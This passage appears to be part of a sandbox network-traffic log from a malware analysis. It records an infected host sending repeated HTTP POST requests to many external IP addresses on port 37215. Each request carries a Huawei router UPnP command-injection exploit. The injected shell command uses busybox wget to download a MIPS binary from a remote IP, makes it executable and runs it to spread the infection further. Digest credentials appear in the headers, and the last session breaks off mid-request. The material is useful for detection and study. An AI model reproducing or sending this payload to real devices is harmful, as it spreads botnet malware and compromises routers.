20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1647192.168.2.1338706197.23.60.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597304106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1648192.168.2.1334140157.83.92.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597311974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1649192.168.2.1349872197.146.177.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597383976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1650192.168.2.134332892.127.79.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597388029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1651192.168.2.1358868157.52.179.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597395897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1652192.168.2.1356422197.149.68.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597413063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1653192.168.2.1354620157.139.40.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597434998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1654192.168.2.135098241.91.177.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597460032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1655192.168.2.1340622157.35.7.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597492933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1656192.168.2.133711841.108.166.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597492933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1657192.168.2.1355510157.9.179.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597557068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
